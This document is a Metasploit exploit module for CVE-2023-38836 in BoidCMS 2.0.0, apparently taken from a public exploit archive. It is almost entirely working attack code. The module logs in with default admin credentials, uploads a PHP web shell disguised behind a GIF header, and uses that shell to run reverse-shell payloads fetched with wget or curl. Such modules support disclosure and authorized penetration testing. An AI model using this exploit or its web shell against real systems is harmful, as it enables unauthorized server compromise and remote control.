BoidCMS 2.0.0 Command Injection

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BoidCMS Command Injection',        'Description' => %q{          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has          the GIF header, even if the file is a php file.        },        'License' => MSF_LICENSE,        'Author' => [          '1337kid',    # Discovery          'bwatters-r7' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-38836' ],          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']        ],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'nix Command',            {              'Platform' => ['linux', 'unix', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['windows', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',                'FETCH_WRITABLE_DIR' => '%TEMP%',                'FETCH_COMMAND' => 'CURL'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-13',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The path', '']),      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])    ])    @token = nil    @shell_filename = nil  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    if res && res.code == 200      title = res.get_html_document.xpath('//title').first.to_s      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')    end    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')  end  def extract_token(res)    token = nil    if res && res.code == 200      token = res.get_html_document.xpath("//input[@name='token']/@value").first    end    token  end  def cms_token    # initial login    return @token unless @token.nil?    vprint_status('Getting Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    @token = extract_token(res)  end  def cms_login?(login_token)    vprint_status('Logging into CMS')    cms_password = datastore['CMS_PASSWORD']    cms_username = datastore['CMS_USERNAME']    vars_form_data =      [        {          'name' => 'username',          'data' => cms_username        },        {          'name' => 'password',          'data' => cms_password        },        {          'name' => 'login',          'data' => 'Login'        },        {          'name' => 'token',          'data' => login_token.to_s        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def upload_php?(login_token, shell_filename)    vprint_status("Uploading PHP file #{shell_filename}")    vars_form_data =      [        {          'name' => 'file',          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',          'filename' => shell_filename        },        {          'name' => 'token',          'data' => login_token.to_s        },        {          'name' => 'upload',          'data' => 'Upload'        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_get' => {        'page' => 'media'      },      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def launch_payload(shell_filename, payload_cmd)    # send the command to the php page    vprint_status('launching Payload')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' =>        {          'cmd' => payload_cmd        }    )  end  def exploit    @shell_filename = datastore['PHP_FILENAME']    login_token = cms_token    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)    if upload_php?(login_token, @shell_filename)      register_file_for_cleanup @shell_filename      launch_payload(@shell_filename, payload.encoded)    else      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')    end  endend